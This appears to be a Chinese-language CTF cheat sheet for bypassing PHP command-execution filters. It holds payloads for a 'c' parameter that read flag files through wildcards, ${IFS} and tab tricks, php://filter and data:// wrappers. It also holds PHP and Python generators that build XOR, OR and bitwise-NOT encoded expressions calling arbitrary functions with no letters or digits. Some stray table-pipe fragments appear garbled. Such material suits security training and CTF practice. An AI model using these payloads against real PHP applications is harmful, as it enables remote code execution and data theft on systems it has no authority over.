# tip
?c=/???/????64 ????.??? 也就是?c=/bin/base64 flag.php
?c=tac<>fla\g.php||
?c=ta\c${IFS}../../../fla?||
过滤flag
system("ls /");
system("tac fl*");
过滤system
echo `tac *`;
过滤空格
echo%09`tac%09*`;
过滤echo `
?c=include$_POST[a]?>
post:a=php://filter/read=convert.base64-encode/resource=flag.php
伪协议
include语句
?c=data:text/plain,<?=system("tac fla*");?>
# 过滤数字和字母
戳此
# 异或
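<?php

// Writes xor_rce.txt: one line per pair of bytes (i, j) where neither byte is
// an ASCII letter or digit and i XOR j is a printable ASCII character (32..126).
// Line format: "<char> %<hex i> %<hex j>\n", hex being two lowercase digits.
//
// Each line pairs a printable character with two bytes that a /[a-z0-9]/i
// check lets through, so such a character filter on input does not by itself
// limit which strings can be composed once the input is evaluated as PHP.

$preg = '/[a-z0-9]/i';
$contents = '';

for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {
        $left = chr($i);
        $right = chr($j);

        // Discard the pair when either operand is itself a letter or digit.
        if (preg_match($preg, $left) || preg_match($preg, $right)) {
            continue;
        }

        // XOR of two one-byte strings yields a one-byte string.
        $c = $left ^ $right;
        $code = ord($c);

        // Logical && (the original used bitwise & on the two comparisons).
        if ($code >= 32 && $code <= 126) {
            $contents .= $c . ' ' . sprintf('%%%02x', $i) . ' ' . sprintf('%%%02x', $j) . "\n";
        }
    }
}

// The original passed an unchecked fopen() result to fwrite()/fclose();
// report a write failure explicitly instead.
if (file_put_contents('xor_rce.txt', $contents) === false) {
    fwrite(STDERR, "cannot write xor_rce.txt\n");
    exit(1);
}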
| |
| |
| |
| |
| import requests |
| import urllib |
| from sys import * |
| import os |
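def action(arg):
    """Encode ``arg`` as a PHP XOR expression using the table in xor_rce.txt.

    Each table line has the form ``<char> %xx %yy``: column 0 is the character,
    columns 2-4 and 6-8 are the two percent-encoded operands. For every
    character of ``arg`` the first matching line is used; a character with no
    line in the table contributes nothing to the output (same as the original).

    Returns the string ``("<left operands>"^"<right operands>")``.

    The table is read once through a context manager; the original re-opened
    and re-scanned the file for every character and left the handle open if an
    exception interrupted the scan.
    """
    table = {}
    if arg:  # the original never touched the file for an empty argument
        with open("xor_rce.txt", "r") as f:
            for line in f:
                # setdefault keeps the first line seen for each character
                table.setdefault(line[0], (line[2:5], line[6:9]))

    s1 = ""
    s2 = ""
    for ch in arg:
        if ch in table:
            left, right = table[ch]
            s1 += left
            s2 += right

    return "(\"" + s1 + "\"^\"" + s2 + "\")"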
| |
# Interactive loop: read a function name and an argument string, encode each
# with action(), and print the two expressions followed by ";".
while True:
    func_expr = action(input("\n[+] your function:"))
    cmd_expr = action(input("[+] your command:"))
    param = func_expr + cmd_expr + ";"
    print(param)
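<?php

// OR variant of the table generator. Writes or_rce.txt: one line per pair of
// bytes (i, j) where neither byte is an ASCII letter or digit and i OR j is a
// printable ASCII character (32..126).
// Line format: "<char> %<hex i> %<hex j>\n", hex being two lowercase digits.
//
// Each line pairs a printable character with two bytes that a /[0-9a-z]/i
// check lets through, so such a character filter on input does not by itself
// limit which strings can be composed once the input is evaluated as PHP.

$preg = '/[0-9a-z]/i';
$contents = '';

for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {
        $left = chr($i);
        $right = chr($j);

        // Discard the pair when either operand is itself a letter or digit.
        if (preg_match($preg, $left) || preg_match($preg, $right)) {
            continue;
        }

        // Bitwise OR of two one-byte strings yields a one-byte string.
        $c = $left | $right;
        $code = ord($c);

        // Logical && (the original used bitwise & on the two comparisons).
        if ($code >= 32 && $code <= 126) {
            $contents .= $c . ' ' . sprintf('%%%02x', $i) . ' ' . sprintf('%%%02x', $j) . "\n";
        }
    }
}

// The original passed an unchecked fopen() result to fwrite()/fclose();
// report a write failure explicitly instead.
if (file_put_contents('or_rce.txt', $contents) === false) {
    fwrite(STDERR, "cannot write or_rce.txt\n");
    exit(1);
}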
| |
| |
| |
| |
| import requests |
| import urllib |
| from sys import * |
| import os |
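def action(arg):
    """Encode ``arg`` as a PHP OR expression using the table in or_rce.txt.

    Each table line has the form ``<char> %xx %yy``: column 0 is the character,
    columns 2-4 and 6-8 are the two percent-encoded operands. For every
    character of ``arg`` the first matching line is used; a character with no
    line in the table contributes nothing to the output (same as the original).

    Returns the string ``("<left operands>"|"<right operands>")``.

    The table is read once through a context manager; the original re-opened
    and re-scanned the file for every character and left the handle open if an
    exception interrupted the scan.
    """
    table = {}
    if arg:  # the original never touched the file for an empty argument
        with open("or_rce.txt", "r") as f:
            for line in f:
                # setdefault keeps the first line seen for each character
                table.setdefault(line[0], (line[2:5], line[6:9]))

    s1 = ""
    s2 = ""
    for ch in arg:
        if ch in table:
            left, right = table[ch]
            s1 += left
            s2 += right

    return "(\"" + s1 + "\"|\"" + s2 + "\")"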
| |
# Interactive loop: read a function name and an argument string, encode each
# with action(), and print the two expressions followed by ";".
while True:
    func_expr = action(input("\n[+] your function:"))
    cmd_expr = action(input("[+] your command:"))
    param = func_expr + cmd_expr + ";"
    print(param)
# 取反
<?php

// Reads two lines from STDIN (a function name and an argument string) and
// prints each one bitwise-negated and URL-encoded, wrapped in the form
// (~<encoded>)(~<encoded>); so that negating the encoded bytes again yields
// the original text.

// Prompt on STDOUT, read one line from STDIN and strip its line terminators.
$ask = static function (string $prompt) {
    fwrite(STDOUT, $prompt);

    return str_replace(["\r\n", "\r", "\n"], '', fgets(STDIN));
};

$system = $ask('[+]your function: ');
$command = $ask('[+]your command: ');

// ~ on a string inverts every byte; urlencode() then percent-encodes the result.
$encodedFunction = urlencode(~$system);
$encodedCommand = urlencode(~$command);

echo '[*] (~' . $encodedFunction . ')(~' . $encodedCommand . ');';
# 读取操作
more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
grep
1、在当前目录中,查找后缀有 file 字样的文件中包含 test 字符串的文件,并打印出该字符串的行。此时,可以使用如下命令:
grep test *file
strings
# 查找
grep flag flag.php 查找 flag.php 文件中含有 flag 的那一行,并且打印出来